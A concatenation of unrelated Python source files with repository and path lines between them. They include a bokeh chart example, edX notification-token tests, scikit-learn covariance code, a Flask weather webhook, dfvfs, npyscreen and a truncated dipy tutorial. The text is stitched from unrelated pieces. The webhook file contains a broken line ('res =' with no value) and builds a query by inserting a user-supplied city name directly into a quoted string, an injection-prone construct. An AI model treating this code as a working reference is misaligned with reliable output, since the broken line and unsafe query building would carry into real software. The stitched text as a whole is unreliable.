from bokeh._legacy_charts import Dot, show, output_file
# create some example data
xyvalues = OrderedDict(
python=[2, 3, 7, 5, 26],
pypy=[12, 33, 47, 15, 126],
jython=[22, 43, 10, 25, 26],
)
# any of the following commented are also valid Dot inputs
#xyvalues = pd.DataFrame(xyvalues)
#xyvalues = list(xyvalues.values())
#xyvalues = np.array(list(xyvalues.values()))
output_file("dots.html")
dots = Dot(
xyvalues, cat=['lists','loops','dicts', 'gen exp', 'exceptions'],
title="Dots Example", ylabel='Performance', legend=True
)
show(dots)
|
defance/edx-platform
|
refs/heads/master
|
lms/djangoapps/notification_prefs/tests.py
|
137
|
import json
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import PermissionDenied
from django.http import Http404
from django.test import TestCase
from django.test.client import RequestFactory
from django.test.utils import override_settings
from mock import Mock, patch
from notification_prefs import NOTIFICATION_PREF_KEY
from notification_prefs.views import ajax_enable, ajax_disable, ajax_status, set_subscription, UsernameCipher
from student.tests.factories import UserFactory
from edxmako.tests import mako_middleware_process_request
from openedx.core.djangoapps.user_api.models import UserPreference
from util.testing import UrlResetMixin
@override_settings(SECRET_KEY="test secret key")
class NotificationPrefViewTest(UrlResetMixin, TestCase):
INITIALIZATION_VECTOR = "\x00" * 16
@patch.dict("django.conf.settings.FEATURES", {"ENABLE_DISCUSSION_SERVICE": True})
def setUp(self):
super(NotificationPrefViewTest, self).setUp()
self.user = UserFactory.create(username="testuser")
# Tokens are intentionally hard-coded instead of computed to help us
# avoid breaking existing links.
self.tokens = {
self.user: "AAAAAAAAAAAAAAAAAAAAAA8mMQo96FZfb1YKv1R5X6s=",
# Username with length equal to AES block length to test padding
UserFactory.create(username="sixteencharsuser"):
"AAAAAAAAAAAAAAAAAAAAAPxPWCuI2Ay9TATBVnfw7eIj-hUh6erQ_-VkbDqHqm8D",
# Even longer username
UserFactory.create(username="thisusernameissoveryverylong"):
"AAAAAAAAAAAAAAAAAAAAAPECbYqPI7_W4mRF8LbTaHuHt3tNXPggZ1Bke-zDyEiZ",
# Non-ASCII username
UserFactory.create(username=u"\u4e2d\u56fd"):
"AAAAAAAAAAAAAAAAAAAAAMjfGAhZKIZsI3L-Z7nflTA="
}
self.request_factory = RequestFactory()
def create_prefs(self):
"""Create all test preferences in the database"""
for (user, token) in self.tokens.items():
UserPreference.objects.create(user=user, key=NOTIFICATION_PREF_KEY, value=token)
def assertPrefValid(self, user):
"""Ensure that the correct preference for the user is persisted"""
pref = UserPreference.objects.get(user=user, key=NOTIFICATION_PREF_KEY)
self.assertTrue(pref) # check exists and only 1 (.get)
# now coerce username to utf-8 encoded str, since we test with non-ascii unicdoe above and
# the unittest framework has hard time coercing to unicode.
# decrypt also can't take a unicode input, so coerce its input to str
self.assertEqual(str(user.username.encode('utf-8')), UsernameCipher().decrypt(str(pref.value)))
def assertNotPrefExists(self, user):
"""Ensure that the user does not have a persisted preference"""
self.assertFalse(
UserPreference.objects.filter(user=user, key=NOTIFICATION_PREF_KEY).exists()
)
# AJAX status view
def test_ajax_status_get_0(self):
request = self.request_factory.get("dummy")
request.user = self.user
response = ajax_status(request)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content), {"status": 0})
def test_ajax_status_get_1(self):
self.create_prefs()
request = self.request_factory.get("dummy")
request.user = self.user
response = ajax_status(request)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content), {"status": 1})
def test_ajax_status_post(self):
request = self.request_factory.post("dummy")
request.user = self.user
response = ajax_status(request)
self.assertEqual(response.status_code, 405)
def test_ajax_status_anon_user(self):
request = self.request_factory.get("dummy")
request.user = AnonymousUser()
self.assertRaises(PermissionDenied, ajax_status, request)
# AJAX enable view
def test_ajax_enable_get(self):
request = self.request_factory.get("dummy")
request.user = self.user
response = ajax_enable(request)
self.assertEqual(response.status_code, 405)
self.assertNotPrefExists(self.user)
def test_ajax_enable_anon_user(self):
request = self.request_factory.post("dummy")
request.user = AnonymousUser()
self.assertRaises(PermissionDenied, ajax_enable, request)
self.assertNotPrefExists(self.user)
@patch("Crypto.Random.new")
def test_ajax_enable_success(self, mock_random_new):
mock_stream = Mock()
mock_stream.read.return_value = self.INITIALIZATION_VECTOR
mock_random_new.return_value = mock_stream
def test_user(user):
request = self.request_factory.post("dummy")
request.user = user
response = ajax_enable(request)
self.assertEqual(response.status_code, 204)
self.assertPrefValid(user)
for user in self.tokens.keys():
test_user(user)
def test_ajax_enable_already_enabled(self):
self.create_prefs()
request = self.request_factory.post("dummy")
request.user = self.user
response = ajax_enable(request)
self.assertEqual(response.status_code, 204)
self.assertPrefValid(self.user)
def test_ajax_enable_distinct_values(self):
request = self.request_factory.post("dummy")
request.user = self.user
ajax_enable(request)
other_user = UserFactory.create()
request.user = other_user
ajax_enable(request)
self.assertNotEqual(
UserPreference.objects.get(user=self.user, key=NOTIFICATION_PREF_KEY).value,
UserPreference.objects.get(user=other_user, key=NOTIFICATION_PREF_KEY).value
)
# AJAX disable view
def test_ajax_disable_get(self):
self.create_prefs()
request = self.request_factory.get("dummy")
request.user = self.user
response = ajax_disable(request)
self.assertEqual(response.status_code, 405)
self.assertPrefValid(self.user)
def test_ajax_disable_anon_user(self):
self.create_prefs()
request = self.request_factory.post("dummy")
request.user = AnonymousUser()
self.assertRaises(PermissionDenied, ajax_disable, request)
self.assertPrefValid(self.user)
def test_ajax_disable_success(self):
self.create_prefs()
request = self.request_factory.post("dummy")
request.user = self.user
response = ajax_disable(request)
self.assertEqual(response.status_code, 204)
self.assertNotPrefExists(self.user)
def test_ajax_disable_already_disabled(self):
request = self.request_factory.post("dummy")
request.user = self.user
response = ajax_disable(request)
self.assertEqual(response.status_code, 204)
self.assertNotPrefExists(self.user)
# Unsubscribe view
def test_unsubscribe_post(self):
request = self.request_factory.post("dummy")
response = set_subscription(request, "dummy", subscribe=False)
self.assertEqual(response.status_code, 405)
def test_unsubscribe_invalid_token(self):
def test_invalid_token(token, message):
request = self.request_factory.get("dummy")
self.assertRaisesRegexp(Http404, "^{}$".format(message), set_subscription, request, token, False)
# Invalid base64 encoding
test_invalid_token("ZOMG INVALID BASE64 CHARS!!!", "base64url")
test_invalid_token("Non-ASCII\xff", "base64url")
test_invalid_token(self.tokens[self.user][:-1], "base64url")
# Token not long enough to contain initialization vector
test_invalid_token("AAAAAAAAAAA=", "initialization_vector")
# Token length not a multiple of AES block length
test_invalid_token(self.tokens[self.user][:-4], "aes")
# Invalid padding (ends in 0 byte)
# Encrypted value: "testuser" + "\x00" * 8
test_invalid_token("AAAAAAAAAAAAAAAAAAAAAMoazRI7ePLjEWXN1N7keLw=", "padding")
# Invalid padding (ends in byte > 16)
# Encrypted value: "testusertestuser"
test_invalid_token("AAAAAAAAAAAAAAAAAAAAAC6iLXGhjkFytJoJSBJZzJ4=", "padding")
# Invalid padding (entire string is padding)
# Encrypted value: "\x10" * 16
test_invalid_token("AAAAAAAAAAAAAAAAAAAAANRGw8HDEmlcLVFawgY9wI8=", "padding")
# Nonexistent user
# Encrypted value: "nonexistentuser\x01"
test_invalid_token("AAAAAAAAAAAAAAAAAAAAACpyUxTGIrUjnpuUsNi7mAY=", "username")
def test_unsubscribe_success(self):
self.create_prefs()
def test_user(user):
request = self.request_factory.get("dummy")
request.user = AnonymousUser()
mako_middleware_process_request(request)
response = set_subscription(request, self.tokens[user], subscribe=False)
self.assertEqual(response.status_code, 200)
self.assertNotPrefExists(user)
for user in self.tokens.keys():
test_user(user)
def test_unsubscribe_twice(self):
self.create_prefs()
request = self.request_factory.get("dummy")
request.user = AnonymousUser()
mako_middleware_process_request(request)
set_subscription(request, self.tokens[self.user], False)
response = set_subscription(request, self.tokens[self.user], subscribe=False)
self.assertEqual(response.status_code, 200)
self.assertNotPrefExists(self.user)
def test_resubscribe_success(self):
def test_user(user):
# start without a pref key
self.assertFalse(UserPreference.objects.filter(user=user, key=NOTIFICATION_PREF_KEY))
request = self.request_factory.get("dummy")
request.user = AnonymousUser()
mako_middleware_process_request(request)
response = set_subscription(request, self.tokens[user], subscribe=True)
self.assertEqual(response.status_code, 200)
self.assertPrefValid(user)
for user in self.tokens.keys():
test_user(user)
|
mjudsp/Tsallis
|
refs/heads/master
|
sklearn/covariance/empirical_covariance_.py
|
80
|
"""
Maximum likelihood covariance estimator.
"""
# Author: Alexandre Gramfort <[email protected]>
# Gael Varoquaux <[email protected]>
# Virgile Fritsch <[email protected]>
#
# License: BSD 3 clause
# avoid division truncation
from __future__ import division
import warnings
import numpy as np
from scipy import linalg
from ..base import BaseEstimator
from ..utils import check_array
from ..utils.extmath import fast_logdet, pinvh
def log_likelihood(emp_cov, precision):
"""Computes the sample mean of the log_likelihood under a covariance model
computes the empirical expected log-likelihood (accounting for the
normalization terms and scaling), allowing for universal comparison (beyond
this software package)
Parameters
----------
emp_cov : 2D ndarray (n_features, n_features)
Maximum Likelihood Estimator of covariance
precision : 2D ndarray (n_features, n_features)
The precision matrix of the covariance model to be tested
Returns
-------
sample mean of the log-likelihood
"""
p = precision.shape[0]
log_likelihood_ = - np.sum(emp_cov * precision) + fast_logdet(precision)
log_likelihood_ -= p * np.log(2 * np.pi)
log_likelihood_ /= 2.
return log_likelihood_
def empirical_covariance(X, assume_centered=False):
"""Computes the Maximum likelihood covariance estimator
Parameters
----------
X : ndarray, shape (n_samples, n_features)
Data from which to compute the covariance estimate
assume_centered : Boolean
If True, data are not centered before computation.
Useful when working with data whose mean is almost, but not exactly
zero.
If False, data are centered before computation.
Returns
-------
covariance : 2D ndarray, shape (n_features, n_features)
Empirical covariance (Maximum Likelihood Estimator).
"""
X = np.asarray(X)
if X.ndim == 1:
X = np.reshape(X, (1, -1))
if X.shape[0] == 1:
warnings.warn("Only one sample available. "
"You may want to reshape your data array")
if assume_centered:
covariance = np.dot(X.T, X) / X.shape[0]
else:
covariance = np.cov(X.T, bias=1)
if covariance.ndim == 0:
covariance = np.array([[covariance]])
return covariance
class EmpiricalCovariance(BaseEstimator):
"""Maximum likelihood covariance estimator
Read more in the :ref:`User Guide <covariance>`.
Parameters
----------
store_precision : bool
Specifies if the estimated precision is stored.
assume_centered : bool
If True, data are not centered before computation.
Useful when working with data whose mean is almost, but not exactly
zero.
If False (default), data are centered before computation.
Attributes
----------
covariance_ : 2D ndarray, shape (n_features, n_features)
Estimated covariance matrix
precision_ : 2D ndarray, shape (n_features, n_features)
Estimated pseudo-inverse matrix.
(stored only if store_precision is True)
"""
def __init__(self, store_precision=True, assume_centered=False):
self.store_precision = store_precision
self.assume_centered = assume_centered
def _set_covariance(self, covariance):
"""Saves the covariance and precision estimates
Storage is done accordingly to `self.store_precision`.
Precision stored only if invertible.
Parameters
----------
covariance : 2D ndarray, shape (n_features, n_features)
Estimated covariance matrix to be stored, and from which precision
is computed.
"""
covariance = check_array(covariance)
# set covariance
self.covariance_ = covariance
# set precision
if self.store_precision:
self.precision_ = pinvh(covariance)
else:
self.precision_ = None
def get_precision(self):
"""Getter for the precision matrix.
Returns
-------
precision_ : array-like,
The precision matrix associated to the current covariance object.
"""
if self.store_precision:
precision = self.precision_
else:
precision = pinvh(self.covariance_)
return precision
def fit(self, X, y=None):
"""Fits the Maximum Likelihood Estimator covariance model
according to the given training data and parameters.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training data, where n_samples is the number of samples and
n_features is the number of features.
y : not used, present for API consistence purpose.
Returns
-------
self : object
Returns self.
"""
X = check_array(X)
if self.assume_centered:
self.location_ = np.zeros(X.shape[1])
else:
self.location_ = X.mean(0)
covariance = empirical_covariance(
X, assume_centered=self.assume_centered)
self._set_covariance(covariance)
return self
def score(self, X_test, y=None):
"""Computes the log-likelihood of a Gaussian data set with
`self.covariance_` as an estimator of its covariance matrix.
Parameters
----------
X_test : array-like, shape = [n_samples, n_features]
Test data of which we compute the likelihood, where n_samples is
the number of samples and n_features is the number of features.
X_test is assumed to be drawn from the same distribution than
the data used in fit (including centering).
y : not used, present for API consistence purpose.
Returns
-------
res : float
The likelihood of the data set with `self.covariance_` as an
estimator of its covariance matrix.
"""
# compute empirical covariance of the test set
test_cov = empirical_covariance(
X_test - self.location_, assume_centered=True)
# compute log likelihood
res = log_likelihood(test_cov, self.get_precision())
return res
def error_norm(self, comp_cov, norm='frobenius', scaling=True,
squared=True):
"""Computes the Mean Squared Error between two covariance estimators.
(In the sense of the Frobenius norm).
Parameters
----------
comp_cov : array-like, shape = [n_features, n_features]
The covariance to compare with.
norm : str
The type of norm used to compute the error. Available error types:
- 'frobenius' (default): sqrt(tr(A^t.A))
- 'spectral': sqrt(max(eigenvalues(A^t.A))
where A is the error ``(comp_cov - self.covariance_)``.
scaling : bool
If True (default), the squared error norm is divided by n_features.
If False, the squared error norm is not rescaled.
squared : bool
Whether to compute the squared error norm or the error norm.
If True (default), the squared error norm is returned.
If False, the error norm is returned.
Returns
-------
The Mean Squared Error (in the sense of the Frobenius norm) between
`self` and `comp_cov` covariance estimators.
"""
# compute the error
error = comp_cov - self.covariance_
# compute the error norm
if norm == "frobenius":
squared_norm = np.sum(error ** 2)
elif norm == "spectral":
squared_norm = np.amax(linalg.svdvals(np.dot(error.T, error)))
else:
raise NotImplementedError(
"Only spectral and frobenius norms are implemented")
# optionally scale the error norm
if scaling:
squared_norm = squared_norm / error.shape[0]
# finally get either the squared norm or the norm
if squared:
result = squared_norm
else:
result = np.sqrt(squared_norm)
return result
def mahalanobis(self, observations):
"""Computes the squared Mahalanobis distances of given observations.
Parameters
----------
observations : array-like, shape = [n_observations, n_features]
The observations, the Mahalanobis distances of the which we
compute. Observations are assumed to be drawn from the same
distribution than the data used in fit.
Returns
-------
mahalanobis_distance : array, shape = [n_observations,]
Squared Mahalanobis distances of the observations.
"""
precision = self.get_precision()
# compute mahalanobis distances
centered_obs = observations - self.location_
mahalanobis_dist = np.sum(
np.dot(centered_obs, precision) * centered_obs, 1)
return mahalanobis_dist
|
TheChef1212/tardis-speech-backend
|
refs/heads/master
|
app3.py
|
1
|
#!/usr/bin/env python
from __future__ import print_function
from future.standard_library import install_aliases
install_aliases()
from urllib.parse import urlparse, urlencode
from urllib.request import urlopen, Request
from urllib.error import HTTPError
import json
import os
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = processRequest(req)
res = json.dumps(res, indent=4)
# print(res)
res =
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def processRequest(req):
if req.get("result").get("action") != "yahooWeatherForecast":
return {}
baseurl = "https://query.yahooapis.com/v1/public/yql?"
yql_query = makeYqlQuery(req)
if yql_query is None:
return {}
yql_url = baseurl + urlencode({'q': yql_query}) + "&format=json"
result = urlopen(yql_url).read()
data = json.loads(result)
res = makeWebhookResult(data)
return res
def makeYqlQuery(req):
result = req.get("result")
parameters = result.get("parameters")
city = parameters.get("geo-city")
if city is None:
return None
return "select * from weather.forecast where woeid in (select woeid from geo.places(1) where text='" + city + "')"
def makeWebhookResult(data):
query = data.get('query')
if query is None:
return {}
result = query.get('results')
if result is None:
return {}
channel = result.get('channel')
if channel is None:
return {}
item = channel.get('item')
location = channel.get('location')
units = channel.get('units')
if (location is None) or (item is None) or (units is None):
return {}
condition = item.get('condition')
if condition is None:
return {}
# print(json.dumps(item, indent=4))
speech = "Today in " + location.get('city') + ": " + condition.get('text') + \
", the temperature is " + condition.get('temp') + " " + units.get('temperature')
print("Response:")
print(speech)
return {
"speech": speech,
"displayText": speech,
# "data": data,
# "contextOut": [],
"source": "apiai-weather-webhook-sample"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print("Starting app on port %d" % port)
app.run(debug=False, port=port, host='0.0.0.0')
|
jorik041/dfvfs
|
refs/heads/master
|
dfvfs/vfs/vshadow_file_entry.py
|
2
|
# -*- coding: utf-8 -*-
"""The Volume Shadow Snapshots (VSS) file entry implementation."""
from dfvfs.lib import date_time
from dfvfs.lib import definitions
from dfvfs.lib import errors
from dfvfs.lib import vshadow
from dfvfs.path import vshadow_path_spec
from dfvfs.vfs import file_entry
from dfvfs.vfs import vfs_stat
class VShadowDirectory(file_entry.Directory):
"""Class that implements a directory object using pyvshadow."""
def _EntriesGenerator(self):
"""Retrieves directory entries.
Since a directory can contain a vast number of entries using
a generator is more memory efficient.
Yields:
A path specification (instance of path.VShadowPathSpec).
"""
# Only the virtual root file has directory entries.
store_index = getattr(self.path_spec, u'store_index', None)
if store_index is not None:
return
location = getattr(self.path_spec, u'location', None)
if location is None or location != self._file_system.LOCATION_ROOT:
return
vshadow_volume = self._file_system.GetVShadowVolume()
for store_index in range(0, vshadow_volume.number_of_stores):
yield vshadow_path_spec.VShadowPathSpec(
location=u'/vss{0:d}'.format(store_index + 1),
store_index=store_index, parent=self.path_spec.parent)
class VShadowFileEntry(file_entry.FileEntry):
"""Class that implements a file entry object using pyvshadow."""
TYPE_INDICATOR = definitions.TYPE_INDICATOR_VSHADOW
def __init__(
self, resolver_context, file_system, path_spec, is_root=False,
is_virtual=False):
"""Initializes the file entry object.
Args:
resolver_context: the resolver context (instance of resolver.Context).
file_system: the file system object (instance of vfs.FileSystem).
path_spec: the path specification (instance of path.PathSpec).
is_root: optional boolean value to indicate if the file entry is
the root file entry of the corresponding file system.
The default is False.
is_virtual: optional boolean value to indicate if the file entry is
a virtual file entry emulated by the corresponding file
system. The default is False.
"""
super(VShadowFileEntry, self).__init__(
resolver_context, file_system, path_spec, is_root=is_root,
is_virtual=is_virtual)
self._name = None
def _GetDirectory(self):
"""Retrieves the directory object (instance of VShadowDirectory)."""
if self._stat_object is None:
self._stat_object = self._GetStat()
if (self._stat_object and
self._stat_object.type == self._stat_object.TYPE_DIRECTORY):
return VShadowDirectory(self._file_system, self.path_spec)
return
def _GetStat(self):
"""Retrieves the stat object.
Returns:
The stat object (instance of vfs.VFSStat).
Raises:
BackEndError: when the vshadow store is missing in a non-virtual
file entry.
"""
vshadow_store = self.GetVShadowStore()
if not self._is_virtual and vshadow_store is None:
raise errors.BackEndError(
u'Missing vshadow store in non-virtual file entry.')
stat_object = vfs_stat.VFSStat()
# File data stat information.
if vshadow_store is not None:
stat_object.size = vshadow_store.volume_size
# Date and time stat information.
if vshadow_store is not None:
timestamp = date_time.PosixTimestamp.FromFiletime(
vshadow_store.get_creation_time_as_integer())
if timestamp is not None:
stat_object.crtime = timestamp
# Ownership and permissions stat information.
# File entry type stat information.
# The root file entry is virtual and should have type directory.
if self._is_virtual:
stat_object.type = stat_object.TYPE_DIRECTORY
else:
stat_object.type = stat_object.TYPE_FILE
return stat_object
@property
def name(self):
"""The name of the file entry, which does not include the full path."""
if self._name is None:
location = getattr(self.path_spec, u'location', None)
if location is not None:
self._name = self._file_system.BasenamePath(location)
else:
store_index = getattr(self.path_spec, u'store_index', None)
if store_index is not None:
self._name = u'vss{0:d}'.format(store_index + 1)
else:
self._name = u''
return self._name
@property
def sub_file_entries(self):
"""The sub file entries (generator of instance of vfs.FileEntry)."""
if self._directory is None:
self._directory = self._GetDirectory()
if self._directory:
for path_spec in self._directory.entries:
yield VShadowFileEntry(
self._resolver_context, self._file_system, path_spec)
def GetParentFileEntry(self):
"""Retrieves the parent file entry."""
return
def GetVShadowStore(self):
"""Retrieves the VSS store object (instance of pyvshadow.store)."""
store_index = vshadow.VShadowPathSpecGetStoreIndex(self.path_spec)
if store_index is None:
return
vshadow_volume = self._file_system.GetVShadowVolume()
return vshadow_volume.get_store(store_index)
|
bzbarsky/servo
|
refs/heads/master
|
tests/wpt/web-platform-tests/service-workers/service-worker/resources/request-headers.py
|
158
|
import json
def main(request, response):
data = {key:request.headers[key] for key,value in request.headers.iteritems()}
return [("Content-Type", "application/json")], json.dumps(data)
|
kmonsoor/npyscreen
|
refs/heads/master
|
npyscreen/fmFileSelector.py
|
14
|
from . import fmFormMutt
from . import wgmultiline
from . import wggrid
from . import wgautocomplete
from . import utilNotify
import curses
import os
import os.path
import operator
class FileCommand(wgautocomplete.Filename):
def set_up_handlers(self):
super(FileCommand, self).set_up_handlers()
self.handlers.update ({
curses.ascii.NL: self.h_select_file,
curses.ascii.CR: self.h_select_file,
"^W": self.h_up_level,
})
def h_select_file(self, *args, **keywords):
self.h_exit_down(None)
self.parent.try_exit()
def h_up_level(self, *args, **keywords):
self.value = os.path.split(self.value)[0]
self.cursor_position = len(self.value)
def auto_complete(self, input):
self.value = os.path.expanduser(self.value)
directory, fname = os.path.split(self.value)
# Let's have absolute paths.
directory = os.path.abspath(directory)
if self.value == '':
self.value=directory
try:
flist = os.listdir(directory)
except:
self.show_brief_message("Can't read directory!")
return False
flist = [os.path.join(directory, x) for x in flist]
possibilities = list(filter(
(lambda x: os.path.split(x)[1].startswith(fname)), flist
))
if len(possibilities) == 0:
# can't complete
curses.beep()
self.cursor_position = len(self.value)
elif len(possibilities) == 1:
if self.value != possibilities[0]:
self.value = possibilities[0]
if os.path.isdir(self.value) \
and not self.value.endswith(os.sep):
self.value = self.value + os.sep
self.cursor_position = len(self.value)
elif len(possibilities) > 1:
self.value = os.path.commonprefix(possibilities)
self.cursor_position = len(self.value)
curses.beep()
if os.path.isdir(self.value) and len(possibilities) < 2:
self.parent.wMain.change_dir(self.value)
if os.path.isdir(self.value) \
and not self.value.endswith(os.sep):
self.value = self.value + os.sep
self.cursor_position = len(self.value)
#self.h_exit_up(None)
else:
self.parent.value = directory
self.parent.update_grid()
class FileGrid(wggrid.SimpleGrid):
default_column_number = 3
def set_up_handlers(self):
super(FileGrid, self).set_up_handlers()
self.handlers.update ({
curses.ascii.NL: self.h_select_file,
curses.ascii.CR: self.h_select_file,
curses.ascii.SP: self.h_select_file,
})
def change_dir(self, select_file):
try:
os.listdir(select_file)
except OSError:
utilNotify.notify_wait(title="Error", message="Cannot enter directory.")
return False
self.parent.value = select_file
self.parent.wCommand.value = select_file
self.parent.update_grid()
self.edit_cell = [0, 0]
self.begin_row_display_at = 0
self.begin_col_display_at = 0
return True
def h_select_file(self, *args, **keywrods):
try:
select_file = os.path.join(self.parent.value, self.values[self.edit_cell[0]][self.edit_cell[1]])
select_file = os.path.abspath(select_file)
except (TypeError, IndexError):
self.edit_cell = [0, 0]
return False
if os.path.isdir(select_file):
self.change_dir(select_file)
else:
self.parent.wCommand.value = select_file
self.h_exit_down(None)
def display_value(self, vl):
p = os.path.split(vl)
if p[1]:
return p[1]
else:
return os.path.split(p[0])[1] + os.sep
class FileSelector(fmFormMutt.FormMutt):
MAIN_WIDGET_CLASS = FileGrid
COMMAND_WIDGET_CLASS= FileCommand
BLANK_LINES_BASE = 0
def __init__(self,
select_dir=False, #Select a dir, not a file
must_exist=False, #Selected File must already exist
confirm_if_exists=True,
sort_by_extension=True,
*args, **keywords):
self.select_dir = select_dir
self.must_exist = must_exist
self.confirm_if_exists = confirm_if_exists
self.sort_by_extension = sort_by_extension
super(FileSelector, self).__init__(*args, **keywords)
try:
if not self.value:
self.value = os.getcwd()
except:
self.value = os.getcwd()
def try_exit(self):
if not self.wCommand.value:
self.value=''
self.exit_editing()
return None
# There is a bug in the next three lines
self.wCommand.value = os.path.join(self.value, self.wCommand.value)
self.wCommand.value = os.path.expanduser(self.wCommand.value)
self.wCommand.value = os.path.abspath(self.wCommand.value)
self.value = self.wCommand.value
if self.confirm_if_exists and os.path.exists(self.value):
if not utilNotify.notify_yes_no(title="Confirm", message="Select Existing File?"):
return False
if self.must_exist and not os.path.exists(self.value):
utilNotify.notify_confirm(title="Error", message="Selected filename does not exist.")
return False
if self.select_dir and not os.path.isdir(self.value):
utilNotify.notify_confirm(title="Error", message="Selected filename is not a directory.")
return False
self.exit_editing()
return True
def set_colors(self):
self.wCommand.color = 'IMPORTANT'
self.wCommand.color = 'STANDOUT'
def beforeEditing(self,):
self.adjust_widgets()
self.set_colors()
def update_grid(self,):
if self.value:
self.value = os.path.expanduser(self.value)
if not os.path.exists(self.value):
self.value = os.getcwd()
if os.path.isdir(self.value):
working_dir = self.value
else:
working_dir = os.path.dirname(self.value)
self.wStatus1.value = working_dir
file_list = []
if os.path.abspath(os.path.join(working_dir, '..')) != os.path.abspath(working_dir):
file_list.append('..')
try:
file_list.extend([os.path.join(working_dir, fn) for fn in os.listdir(working_dir)])
except OSError:
utilNotify.notify_wait(title="Error", message="Could not read specified directory.")
# DOES NOT CURRENTLY WORK - EXCEPT FOR THE WORKING DIRECTORY. REFACTOR.
new_file_list= []
for f in file_list:
f = os.path.normpath(f)
if os.path.isdir(f):
new_file_list.append(f + os.sep)
else:
new_file_list.append(f) # + "*")
file_list = new_file_list
del new_file_list
# sort Filelist
file_list.sort()
if self.sort_by_extension:
file_list.sort(key=self.get_extension)
file_list.sort(key=os.path.isdir, reverse=True)
self.wMain.set_grid_values_from_flat_list(file_list, reset_cursor=False)
self.display()
def get_extension(self, fn):
return os.path.splitext(fn)[1]
def adjust_widgets(self):
self.update_grid()
def selectFile(starting_value=None, *args, **keywords):
F = FileSelector(*args, **keywords)
F.set_colors()
F.wCommand.show_bold = True
if starting_value:
if not os.path.exists(os.path.abspath(os.path.expanduser(starting_value))):
F.value = os.getcwd()
else:
F.value = starting_value
F.wCommand.value = starting_value
else:
F.value = os.getcwd()
F.update_grid()
F.display()
F.edit()
return F.wCommand.value
|
omarocegueda/dipy
|
refs/heads/master
|
doc/examples/segment_clustering_metrics.py
|
9
|
"""
===========================================
Tractography Clustering - Available Metrics
===========================================
This page lists available metrics that can be used by the tractography
clustering framework. For every metric a brief description is provided
explaining: what it does, when it's useful and how to use it. If you are not
familiar with the tractography clustering framework, check this tutorial
:ref:`clustering-framework`.
.. contents:: Available Metrics
:local:
:depth: 1
**Note**:
All examples assume a function `get_streamlines` exists. We defined here a
simple function to do so. It imports the necessary modules and load a small
streamline bundle.
"""
def get_streamlines():
from nibabel import trackvis as tv
from dipy.data import get_data
fname = get_data('fornix')
streams, hdr = tv.read(fname)
streamlines = [i[0] for i in streams]
return streamlines
"""
.. _clustering-examples-AveragePointwiseEuclideanMetric:
Average of Pointwise Euclidean Metric
=====================================
**What:** Instances of `AveragePointwiseEuclideanMetric` first compute the
pointwise Euclidean distance between two sequences *of same length* then
return the average of those distances. This metric takes as inputs two features
that are sequences containing the same number of elements.
**When:** By default the `QuickBundles` clustering will resample your
streamlines on-the-fly so they have 12 points. If for some reason you want
to avoid this and you made sure all your streamlines have already the same
number of points, you can manually provide an instance of
`AveragePointwiseEuclideanMetric` to `QuickBundles`. Since the default
`Feature` is the `IdentityFeature` the streamlines won't be resampled thus
saving some computational time.
**Note:** Inputs must be sequences of same length.
"""
from dipy.viz import fvtk
from dipy.segment.clustering import QuickBundles
from dipy.segment.metric import AveragePointwiseEuclideanMetric
# Get some streamlines.
streamlines = get_streamlines() # Previously defined.
# Make sure our streamlines have the same number of points.
from dipy.tracking.streamline import set_number_of_points
streamlines = set_number_of_points(streamlines, nb_points=12)
# Create the instance of `AveragePointwiseEuclideanMetric` to use.
metric = AveragePointwiseEuclideanMetric()
qb = QuickBundles(threshold=10., metric=metric)
clusters = qb.cluster(streamlines)
print("Nb. clusters:", len(clusters))
print("Cluster sizes:", map(len, clusters))
"""
::
Nb. clusters: 4
Cluster sizes: [64, 191, 44, 1]
.. _clustering-examples-SumPointwiseEuclideanMetric:
Sum of Pointwise Euclidean Metric
=================================
**What:** Instances of `SumPointwiseEuclideanMetric` first compute the
pointwise Euclidean distance between two sequences *of same length* then
return the sum of those distances.
**When:** This metric mainly exists because it is used internally by
`AveragePointwiseEuclideanMetric`.
**Note:** Inputs must be sequences of same length.
"""
from dipy.segment.clustering import QuickBundles
from dipy.segment.metric import SumPointwiseEuclideanMetric
# Get some streamlines.
streamlines = get_streamlines() # Previously defined.
# Make sure our streamlines have the same number of points.
from dipy.tracking.streamline import set_number_of_points
nb_points = 12
streamlines = set_number_of_points(streamlines, nb_points=nb_points)
# Create the instance of `SumPointwiseEuclideanMetric` to use.
metric = SumPointwiseEuclideanMetric()
qb = QuickBundles(threshold=10.*nb_points, metric=metric)
clusters = qb.cluster(streamlines)
print("Nb. clusters:", len(clusters))
print("Cluster sizes:", map(len, clusters))
"""
::
Nb. clusters: 4
Cluster sizes: [64, 191, 44, 1]
.. _clustering-examples-MinimumAverageDirectFlipMetric:
Minimum Average Direct Flip Metric (MDF)
========================================
**What:** It is the metric used in the QuickBundles algorithm [Garyfallidis12]_.
Instances of `MinimumAverageDirectFlipMetric` first compute the
direct distance *d1* by taking the average of the pointwise
Euclidean distances between two sequences *of same length*. Reverse
one of the two sequences and compute the flip distance *d2* using the same
approach as for *d1*. Then, return the minimum between *d1* and *d2*.
**When:** This metric mainly exists because it is used internally by
`AveragePointwiseEuclideanMetric`.
**Note:** Inputs must be sequences of same length.
"""
from dipy.segment.metric import MinimumAverageDirectFlipMetric
# Get some streamlines.
streamlines = get_streamlines() # Previously defined.
# Make sure our streamlines have the same number of points.
from dipy.tracking.streamline import set_number_of_points
streamlines = set_number_of_points(streamlines, nb_points=20)
# Create the instance of `MinimumAverageDirectFlipMetric` to use.
metric = MinimumAverageDirectFlipMetric()
d = metric.dist(streamlines[0], streamlines[1])
print("MDF distance between the first two streamlines: ", d)
"""
::
MDF distance between the first two streamlines: 11.681308709622542
.. _clustering-examples-MinimumAverageDirectFlipMetric:
Cosine Metric
=============
**What:** Instances of `CosineMetric` compute the cosine distance between two
vectors (for more information see the
`wiki page <https://en.wikipedia.org/wiki/Cosine_similarity>`_).
**When:** This metric can be useful when you *only* need information about the
orientation of a streamline.
**Note:** Inputs must be vectors (i.e. 1D array).
"""
import numpy as np
from dipy.viz import fvtk
from dipy.segment.clustering import QuickBundles
from dipy.segment.metric import VectorOfEndpointsFeature
